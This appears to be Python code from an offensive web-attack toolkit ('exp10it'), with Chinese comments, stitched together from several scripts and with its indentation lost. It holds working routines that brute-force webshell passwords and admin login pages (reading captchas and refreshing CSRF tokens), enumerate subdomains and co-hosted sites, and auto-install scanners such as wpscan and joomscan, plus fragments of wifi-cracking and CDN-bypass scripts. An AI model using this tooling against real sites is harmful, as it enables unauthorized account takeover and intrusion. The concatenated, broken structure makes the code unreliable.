def crack_webshell(url, anyway=1):
# webshll爆破,第二个参数默认为0,如果设置不为0,则不考虑判断是否是webshll,如果设置为1,直接按direct_bao方式爆破
# 如果设置为2,直接按biaodan_bao方式爆破
figlet2file("cracking webshell", 0, True)
print("cracking webshell --> %s" % url)
print("正在使用吃奶的劲爆破...")
ext = get_webshell_suffix_type(url)
tmp = check_webshell_url(url)
url_http_domain = get_http_domain_from_url(url)
if tmp['y2'] == 'direct_bao' or tmp['y2'] == 'biaodan_bao':
pass
if anyway == 1 or tmp['y2'] == "direct_bao":
return_value = crack_ext_direct_webshell_url(
url, ModulePath + "dicts/webshell_passwords.txt", ext)
if return_value['cracked'] == 0:
print("webshell爆破失败 :(")
return ""
else:
# 爆破成功将cracked_webshell_url_info标记为webshell密码信息,并将webshell密码信息加入到相应非urls表
# 中的cracked_webshell_urls_info字段中
strings_to_write = "webshell:%s,password:%s" % (
url, return_value['password'])
elif anyway == 2 or tmp['y2'] == "biaodan_bao":
pass
'''
return_value = crack_allext_biaodan_webshell_url(
url, ModulePath + "dicts/user.txt", ModulePath + "dicts/webshell_passwords.txt")
if return_value['cracked'] == 0:
print("webshell爆破失败 :(")
return ""
else:
# 爆破成功将cracked_webshell_url_info标记为webshell密码信息,并将webshell密码信息加入到相应表中的
# cracked_webshell_urls_info字段中
strings_to_write = "webshell:%s,password:%s" % (
url, return_value['password'])
'''
elif tmp['y2'] == "bypass":
print(
Fore.RED +
"congratulations!!! webshell may found and has no password!!!")
string = "cracked webshell:%s no password!!!" % url
print(Fore.RED + string)
# 爆破成功将cracked_webshell_url_info标记为webshell密码信息,并将webshell密码信息加入到相应表中的
# cracked_webshell_urls_info字段中
strings_to_write = "webshell:%s,password:%s" % (
url, return_value['password'])
else:
strings_to_write = "这不是一个webshell :("
return strings_to_write
def get_sub_domains(target, use_tool="Sublist3r"):
# target为http开头+domain
# 注意target(http://www.baidu.com)要换成如baidu.com的结果,然后再当作参数传入下面可能用的工具中
# www.baidu.com--->baidu.com,baidu.com是下面工具的参数
# use_tool为子站获取工具选择
# Sublist3r工具详情如下
# 获取子站列表,domain为域名格式,不含http
# https://github.com/aboul3la/Sublist3r
# works in python2,use os.system get the execute output
if target[:4] == "http":
domain = target.split("/")[-1]
else:
print(
"make sure your para in get_sub_domains func has scheme like http or https"
)
return
figlet2file("geting sub domains", 0, True)
root_domain = get_root_domain(domain)
if os.path.exists(logFolderPath) == False:
os.system("mkdir %s" % logFolderPath)
if os.path.exists("%s/sub" % logFolderPath) == False:
os.system("cd %s && mkdir sub" % logFolderPath)
store_file = logFolderPath + "/sub/" + domain.replace(".",
"_") + "_sub.txt"
Sublist3r_store_file = "Sublist3r.out.txt"
subDomainsBrute_store_file = "subDomainsBrute.out.txt"
def Sublist3r(domain):
# 用Sublist3r方式获取子站
if os.path.exists(ModulePath + "Sublist3r") == False:
os.system(
"git clone https://github.com/aboul3la/Sublist3r.git %sSublist3r"
% ModulePath)
# 下面的cd到一个目录只在一句代码中有效,执行完就不在Sublist3r目录里了
os.system("cd %sSublist3r && pip install -r requirements.txt" %
ModulePath)
# 下面的命令执行不受上面的cd到一个目录影响
os.system("cd %sSublist3r && python sublist3r.py -v -d %s -o %s" %
(ModulePath, root_domain, Sublist3r_store_file))
else:
os.system("cd %sSublist3r && python sublist3r.py -v -d %s -o %s" %
(ModulePath, root_domain, Sublist3r_store_file))
def subDomainsBrute(domain):
# 用subDomainsBrute方式获取子站
# https://github.com/lijiejie/subDomainsBrute.git
if os.path.exists(ModulePath + "subDomainsBrute") == False:
os.system(
"git clone https://github.com/lijiejie/subDomainsBrute.git %ssubDomainsBrute"
% ModulePath)
os.system("pip install dnspython")
os.system(
"cd %ssubDomainsBrute && python subDomainsBrute.py -i -o %s %s"
% (ModulePath, subDomainsBrute_store_file, root_domain))
else:
os.system(
"cd %ssubDomainsBrute && python subDomainsBrute.py -i -o %s %s"
% (ModulePath, subDomainsBrute_store_file, root_domain))
if os.path.exists(store_file) == False:
if use_tool == "all":
Sublist3r(root_domain)
os.system("cat %sSublist3r/%s >> %s" %
(ModulePath, Sublist3r_store_file, store_file))
os.system("rm %sSublist3r/%s" % (ModulePath, Sublist3r_store_file))
subDomainsBrute(root_domain)
with open(
"%ssubDomainsBrute/%s" %
(ModulePath, subDomainsBrute_store_file), "r+") as f:
with open(store_file, "a+") as outfile:
for each in f:
if each not in outfile.readlines():
outfile.write(each)
os.system("rm %ssubDomainsBrute/%s" %
(ModulePath, subDomainsBrute_store_file))
if use_tool == "Sublist3r":
Sublist3r(domain)
os.system("cat %sSublist3r/%s >> %s" %
(ModulePath, Sublist3r_store_file, store_file))
os.system("rm %sSublist3r/%s" % (ModulePath, Sublist3r_store_file))
if use_tool == "subDomainsBrute":
subDomainsBrute(domain)
os.system("cat %ssubDomainsBrute/%s >> %s" %
(ModulePath, subDomainsBrute_store_file, store_file))
os.system("rm %ssubDomainsBrute/%s" %
(ModulePath, subDomainsBrute_store_file))
else:
# 文件存在说明上次已经获取sub domains
print("you have got the sub domains last time")
with open(store_file, "r+") as f:
string = f.read()
return string
### function: try to get the actual ip behind cdn
### date: 2016-11-05
### author: quanyechavshuo
### blog: http://3xp10it.cc
#############################################################
# usage:python3 xcdn.py www.baidu.com
import time
import os
try:
import exp10it
except:
os.system("pip3 install exp10it")
# os.system("pip3 install exp10it -U --no-cache-dir")
from exp10it import figlet2file
try:
figlet2file("3xp10it", 0, True)
except:
pass
time.sleep(1)
from exp10it import CLIOutput
from exp10it import get_root_domain
from exp10it import get_string_from_command
from exp10it import get_http_or_https
from exp10it import post_request
from exp10it import get_request
from exp10it import checkvpn
import sys
import re
###
### name: xwifi
### function: auto crack wifi in macOS
### date: 2017-06-07
### author: quanyechavshuo
### blog: http://3xp10it.cc
#############################################################
# 目前只适用于macOS
# test on:macOS sierra 10.12.5
import time
import os
os.system("pip3 install exp10it -U --no-cache --retries 0")
from exp10it import figlet2file
figlet2file("xwifi", 0, True)
time.sleep(1)
from exp10it import get_string_from_command
from exp10it import get_all_file_name
from multiprocessing import Process
import re
import time
import sys
os.system("echo testfor_handshake > /tmp/forhandshakedict.txt")
a = get_string_from_command("ack")
if re.search(r"not found", a, re.I):
input(
"Please install ack first,eg.brew install ack,after you finished it,press anykey to continue."
)
a = get_string_from_command("airport")
def get_pang_domains(target):
# 得到target的旁站列表
# target为如http://www.baidu.com的域名,含http
if target[:4] == "http":
domain = target.split("/")[-1]
else:
print("please make sure param has scheme http or https")
return
figlet2file("geting pang domains", 0, True)
print(target)
import os
if False == os.path.exists(LOG_FOLDER_PATH):
os.system("mkdir %s" % LOG_FOLDER_PATH)
if False == os.path.exists("%s/pang" % LOG_FOLDER_PATH):
os.system("cd %s && mkdir pang" % LOG_FOLDER_PATH)
domain_pang_file = "%s/pang/%s_pang.txt" % (LOG_FOLDER_PATH,
domain.replace(".", "_"))
import os
import socket
if os.path.exists(domain_pang_file):
# 文件存在说明上次已经获取过旁站结果
print("you have got the pang domains last time")
with open(domain_pang_file, "r+") as f:
result = f.read()
return result
# 如果数据库中存在对应表,但没有内容,说明数据库中表被删除,
# 后来由于database_init函数在auto_attack重新运行时被执行,又有了旁站表
# 此时旁站表为空将文件中的旁站写入数据库中
else:
domain_list = []
http_domain_list = []
origin_http_domain_url_list = []
#ip = get_ip(domain)
xcdn_obj = Xcdn(domain)
ip = xcdn_obj.return_value
if ip == 0:
#此时有cdn但是没有找到真实ip,这种情况不获取旁站,退出当前处理过程
return_string = "Sorry,since I can not find the actual ip behind the cdn,I will not get pang domains."
print(return_string)
return return_string
print(domain)
all_nics_ip = socket.gethostbyname_ex(domain)[2]
query = "ip:%s" % ip
for piece in bing_search(query, 'Web'):
if "https://" in piece['Url']:
each_domain = piece['Url'][8:-1].split('/')[0]
if each_domain not in domain_list and get_ip(
each_domain) in all_nics_ip:
domain_list.append(each_domain)
http_domain_list.append("https://" + each_domain)
origin_http_domain_url_list.append(piece['Url'])
else:
each_domain = piece['Url'][7:-1].split('/')[0]
if each_domain not in domain_list and get_ip(
each_domain) in all_nics_ip:
domain_list.append(each_domain)
http_domain_list.append("http://" + each_domain)
origin_http_domain_url_list.append(piece['Url'])
print(http_domain_list)
import os
save_url_to_file(http_domain_list, domain_pang_file)
f = open(domain_pang_file, "r+")
all = f.read()
f.close()
find_http_domain = re.search(
r"(http(s)?://%s)" % re.sub(r"\.", "\.", domain), all)
http_domain = ""
if find_http_domain:
http_domain = find_http_domain.group(1)
else:
print("can not find http_domain in %s" % domain_pang_file)
pang_domains = ""
for each in http_domain_list:
if re.sub(r"(\s)$", "", each) != target:
pang_domains += (each + '\n')
#这里返回的是string结果
return pang_domains
#############################################################
###
### _|_|_| _| _| _| _|
### _| _| _| _|_|_| _|_| _| _| _|_|_|_|
### _|_| _|_| _| _| _| _| _| _| _|
### _| _| _| _| _| _| _| _| _| _|
### _|_|_| _| _| _|_|_| _| _| _| _|_|
### _|
### _|
###
### name: blog.py
### function: write blog
### date: 2016-11-02
### author: quanyechavshuo
### blog: http://3xp10it.cc
#############################################################
import time
import os
from exp10it import figlet2file
from exp10it import blog
os.system("pip3 install exp10it -U --no-cache")
figlet2file("3xp10it",0,True)
time.sleep(1)
blog()
def crack_admin_login_url(
url,
user_dict_file=ModulePath + "dicts/user.txt",
pass_dict_file=ModulePath + "dicts/pass.txt",
yanzhengma_len=0):
# 这里的yanzhengma_len是要求的验证码长度,默认不设置,自动获得,根据不同情况人为设置不同值效果更好
# 爆破管理员后台登录url,尝试自动识别验证码,如果管理员登录页面没有验证码,加了任意验证码数据也可通过验证
import requests
figlet2file("cracking admin login url", 0, True)
print("cracking admin login url:%s" % url)
print("正在使用吃奶的劲爆破登录页面...")
def crack_admin_login_url_thread(url,username,password):
if get_flag[0] == 1:
return
try_time[0] += 1
if requestAction=="GET":
final_request_url=form_action_url
final_request_url=re.sub(r"%s=[^&]*" % user_form_name,"%s=%s" %
(user_form_name,username),final_request_url)
final_request_url=re.sub(r"%s=[^&]*" % pass_form_name,"%s=%s" %
(pass_form_name,password),final_request_url)
if has_yanzhengma[0]:
if needOnlyGetOneYanZhengMa:
yanzhengmaValue=onlyOneYanZhengMaValue
else:
yanzhengmaValue=get_one_valid_yangzhengma_from_src(yanzhengma_src)
final_request_url=re.sub(r"%s=[^&]*" % yanzhengma_form_name,"%s=%s" %
(yanzhengma_form_name,yanzhengmaValue),final_request_url)
if hasCsrfToken:
final_request_url=re.sub(r"%s=[^&]*" % csrfTokenName,currentCsrfTokenPart[0],final_request_url)
html=s.get(final_request_url).text
if hasCsrfToken:
csrfTokenValue=get_csrf_token_value_from_html(html)
currentCsrfTokenPart[0]=csrfTokenPart+csrfTokenValue
else:
#post request
paramPartValue=form_action_url.split("^")[1]
paramList=paramPartValue.split("&")
values={}
for eachP in paramList:
eachPList=eachP.split("=")
eachparamName=eachPList[0]
eachparamValue=eachPList[1]
if eachparamName==user_form_name:
eachparamValue=username
if eachparamName==pass_form_name:
eachparamValue=password
values[eachparamName]=eachparamValue
if has_yanzhengma[0]:
if not needOnlyGetOneYanZhengMa:
values[yanzhengma_form_name]=get_one_valid_yangzhengma_from_src(yanzhengma_src)
else:
values[yanzhengma_form_name]=onlyOneYanZhengMaValue
if hasCsrfToken:
values[csrfTokenName]=re.search(r"[^=]+=(.*)",currentCsrfTokenPart[0]).group(1)
html = s.post(form_action_url.split("^")[0], values).text
if hasCsrfToken:
csrfTokenValue=get_csrf_token_value_from_html(html)
currentCsrfTokenPart[0]=csrfTokenPart+csrfTokenValue
USERNAME_PASSWORD = "******" + username + ":" + \
password + ")" + (52 - len(password)) * " "
# 每100次计算完成任务的平均速度
left_time = get_remain_time(
start[0],
biaoji_time[0],
remain_time[0],
100,
try_time[0],
sum[0])
remain_time[0] = left_time
sys.stdout.write('-' * (try_time[0] * 100 // sum[0]) + '>' + str(try_time[0] * 100 // sum[0]) +
'%' + ' %s/%s remain time:%s %s\r' % (try_time[0], sum[0], remain_time[0], USERNAME_PASSWORD))
sys.stdout.flush()
if len(html) > logined_least_length:
# 认为登录成功
get_flag[0] = 1
end = time.time()
CLIOutput().good_print(
"congratulations!!! admin login url cracked succeed!!!", "red")
string = "cracked admin login url:%s username and password:(%s:%s)" % (
url, username, password)
CLIOutput().good_print(string, "red")
return_string[0]=string
print("you spend time:" + str(end - start[0]))
http_domain_value = get_http_domain_from_url(url)
# 经验证terminate()应该只能结束当前线程,不能达到结束所有线程
table_name_list = get_target_table_name_list(http_domain_value)
urls_table_name = http_domain_value.split(
"/")[-1].replace(".", "_") + "_urls"
return {'username': username, 'password': password}
def crack_admin_login_url_inside_func(url, username, pass_dict_file):
# urls和usernames是相同内容的列表
urls = []
usernames = []
# passwords是pass_dict_file文件对应的所有密码的集合的列表
passwords = []
i = 0
while 1:
if os.path.exists(pass_dict_file) is False:
print("please input your password dict:>", end=' ')
pass_dict_file = input()
if os.path.exists(pass_dict_file) is True:
break
else:
break
f = open(pass_dict_file, "r+")
for each in f:
urls.append(url)
usernames.append(username)
each = re.sub(r"(\s)$", "", each)
passwords.append(each)
i += 1
f.close()
sum[0] = usernames_num * i
if needOnlyGetOneYanZhengMa or hasCsrfToken:
max_workers=1
else:
max_workers=20
with futures.ThreadPoolExecutor(max_workers=max_workers) as executor:
executor.map(crack_admin_login_url_thread, urls, usernames, passwords)
def get_one_valid_yangzhengma_from_src(yanzhengmaUrl):
# 这里不用exp10it模块中打包好的get_request和post_request来发送request请求,因为要保留session在服务器需要
#yanzhengma = get_string_from_url_or_picfile(yanzhengma_src)
while 1:
import shutil
response = s.get(yanzhengmaUrl, stream=True)
with open('img.png', 'wb') as out_file:
shutil.copyfileobj(response.raw, out_file)
del response
yanzhengma = get_string_from_url_or_picfile("img.png")
os.system("rm img.png")
time.sleep(3)
if re.search(r"[^a-zA-Z0-9]+", yanzhengma):
# time.sleep(3)
continue
elif re.search(r"\s", yanzhengma):
continue
elif yanzhengma == "":
continue
else:
if yanzhengma_len != 0:
if len(yanzhengma) != yanzhengma_len:
continue
# print(yanzhengma)
# print(len(yanzhengma))
break
return yanzhengma
a=get_request(url,by="seleniumPhantomJS")
get_result = get_user_and_pass_form_from_html(a['content'])
user_form_name = get_result['user_form_name']
pass_form_name = get_result['pass_form_name']
if user_form_name is None:
print("user_form_name is None")
return
if pass_form_name is None:
print("pass_form_name is None")
return
form_action_url = a['formActionValue']
#default request action=post
requestAction="POST"
if a['hasFormAction']:
if "^" not in a['formActionValue']:
requestAction="GET"
else:
print("url is not a admin login url entry")
return
get_flag = [0]
return_string=[""]
try_time = [0]
sum = [0]
start = [0]
# 用来标记当前时间的"相对函数全局"变量
biaoji_time = [0]
# 用来标记当前剩余完成时间的"相对函数全局"变量
tmp = time.time()
remain_time = [tmp - tmp]
# current_username_password={}
has_yanzhengma = [False]
find_yanzhengma = get_yanzhengma_form_and_src_from_url(url)
if find_yanzhengma:
yanzhengma_form_name = find_yanzhengma['yanzhengma_form_name']
yanzhengma_src = find_yanzhengma['yanzhengma_src']
has_yanzhengma = [True]
hasCsrfToken=False
forCsrfToken=get_url_has_csrf_token(url)
if forCsrfToken['hasCsrfToken']:
hasCsrfToken=True
csrfTokenName=forCsrfToken['csrfTokenName']
csrfTokenPart=csrfTokenName+"="
currentCsrfTokenPart=[""]
s = requests.session()
# sesssion start place
sessionStart=s.get(url)
unlogin_length = len(sessionStart.text)
# 如果post数据后返回数据长度超过未登录时的0.5倍则认为是登录成功
logined_least_length = unlogin_length + unlogin_length / 2
if hasCsrfToken:
csrf_token_value=get_csrf_token_value_from_html(sessionStart.text)
currentCsrfTokenPart=[csrfTokenPart+csrf_token_value]
needOnlyGetOneYanZhengMa=False
if has_yanzhengma[0]:
if "^" in form_action_url:
#post request
print(get_value_from_url(form_action_url.split("^")[0])['y1'])
if get_value_from_url(form_action_url.split("^")[0])['y1']!=get_value_from_url(a['currentUrl'])['y1']:
# should update yanzhengma everytime
needOnlyGetOneYanZhengMa=True
else:
#get request
if get_value_from_url(form_action_url)['y1']!=get_value_from_url(a['currentUrl'])['y1']:
needOnlyGetOneYanZhengMa=True
if needOnlyGetOneYanZhengMa:
print("Congratulation! Target login url need only one yanzhengma!!")
import shutil
response = s.get(yanzhengma_src, stream=True)
with open('img.png', 'wb') as out_file:
shutil.copyfileobj(response.raw, out_file)
del response
onlyOneYanZhengMaValue= input("Please open img.png and input the yanzhengma string:>")
#get_string_from_url_or_picfile("img.png")
os.system("rm img.png")
with open(r"%s" % user_dict_file, "r+") as user_file:
all_users = user_file.readlines()
usernames_num = len(all_users)
start[0] = time.time()
for username in all_users:
# 曾经双层多线程,没能跑完所有的组合,于是不再这里再开多线程
username = re.sub(r'(\s)$', '', username)
crack_admin_login_url_inside_func(a['currentUrl'], username, pass_dict_file)
return return_string[0]
def single_cms_scan(target):
# 对target根据target的cms类型进行cms识别及相应第三方工具扫描,target可以是主要目标或者是旁站或是子站
# target要求为http+domain格式
figlet2file("cms scaning...", 0, True)
print(target)
import os
cms_value = cms_identify(target)
if cms_value == "unknown":
return ""
# 下面相当于cms_scan过程
if False == os.path.exists(logFolderPath):
os.system("mkdir %s" % logFolderPath)
if False == os.path.exists(logFolderPath + "/cms_scan_log"):
os.system("cd %s && mkdir cms_scan_log" % logFolderPath)
if False == os.path.exists(ModulePath + "cms_scan"):
os.system("mkdir %s" % ModulePath + "cms_scan")
if cms_value == 'discuz':
if False == os.path.exists(ModulePath + "log/cms_scan_log/dzscan"):
os.system("cd %slog/cms_scan_log && mkdir dzscan" % ModulePath)
cms_scaner_list = os.listdir(ModulePath + "cms_scan")
if "dzscan" not in cms_scaner_list:
os.system(
"cd %scms_scan && git clone https://github.com/code-scan/dzscan.git"
% ModulePath)
log_file = target.split("/")[-1].replace(".", "_") + ".log"
if os.path.exists(ModulePath + "log/cms_scan_log/dzscan/" + log_file):
pass
else:
os.system(
"cd %scms_scan/dzscan && python dzscan.py --update && python dzscan.py -u %s --log"
% (ModulePath, target))
os.system("mv %scms_scan/dzscan/%s %slog/cms_scan_log/dzscan/" %
(ModulePath, log_file, ModulePath))
cms_scan_result = ""
if os.path.exists(ModulePath + "log/cms_scan_log/dzscan/" +
log_file) == True:
with open(ModulePath + "log/cms_scan_log/dzscan/" + log_file,
"r+") as f:
cms_scan_result = f.read()
if cms_value == 'joomla':
if False == os.path.exists(ModulePath + "log/cms_scan_log/joomscan"):
os.system("cd %slog/cms_scan_log && mkdir joomscan" % ModulePath)
cms_scaner_list = os.listdir(ModulePath + "cms_scan")
if "joomscan" not in cms_scaner_list:
os.system("cd %scms_scan && wget \
http://jaist.dl.sourceforge.net/project/joomscan/joomscan/2012-03-10/joomscan-latest.zip \
&& unzip joomscan-latest.zip -d joomscan && rm joomscan-latest.zip" %
ModulePath)
result = get_string_from_command(
"perl %scms_scan/joomscan/joomscan.pl" % ModulePath)
if re.search(r'you may need to install the Switch module', result):
os.system(
"sudo apt-get install libswitch-perl && perl -MCPAN -e 'install WWW::Mechanize'"
)
log_file = "report/%s-joexploit.txt" % target.split("/")[-1]
if os.path.exists(ModulePath + "log/cms_scan_log/joomscan/" +
log_file):
pass
else:
os.system(
"cd %scms_scan/joomscan && perl joomscan.pl update && perl joomscan.pl -u %s -ot"
% (ModulePath, target))
os.system("mv %scms_scan/joomscan/%s log/cms_scan_log/joomscan/ " %
(ModulePath, log_file))
with open(ModulePath + "log/cms_scan_log/joomscan/" + log_file[7:],
"r+") as f:
cms_scan_result = f.read()
if cms_value == 'wordpress':
if False == os.path.exists(ModulePath + "log/cms_scan_log/wpscan"):
os.system("cd %slog/cms_scan_log && mkdir wpscan" % ModulePath)
cms_scaner_list = os.listdir(ModulePath + "cms_scan")
if "wpscan" not in cms_scaner_list:
os.system(
"cd %scms_scan && git clone https://github.com/wpscanteam/wpscan.git && cd wpscan && echo y | unzip data.zip"
% ModulePath)
result = get_string_from_command("ruby %scms_scan/wpscan/wpscan.rb" %
ModulePath)
if re.search(r'ERROR', result):
os.system(
"sudo apt-get install libcurl4-openssl-dev libxml2 libxml2-dev libxslt1-dev \
ruby-dev build-essential libgmp-dev zlib1g-dev")
os.system("gem install bundler && bundle install")
log_file = "%s.txt" % target.split("/")[-1]
if os.path.exists(ModulePath + "log/cms_scan_log/wpscan/" + log_file):
pass
else:
os.system(
"cd %scms_scan/wpscan && ruby wpscan.rb --update && ruby wpscan.rb %s | tee %s"
% (ModulePath, target, log_file))
os.system("mv %scms_scan/wpscan/%s %slog/cms_scan_log/wpscan/" %
(ModulePath, log_file, ModulePath))
with open(ModulePath + "log/cms_scan_log/wpscan/" + log_file,
"r+") as f:
cms_scan_result = f.read()
print(cms_scan_result)
return cms_scan_result
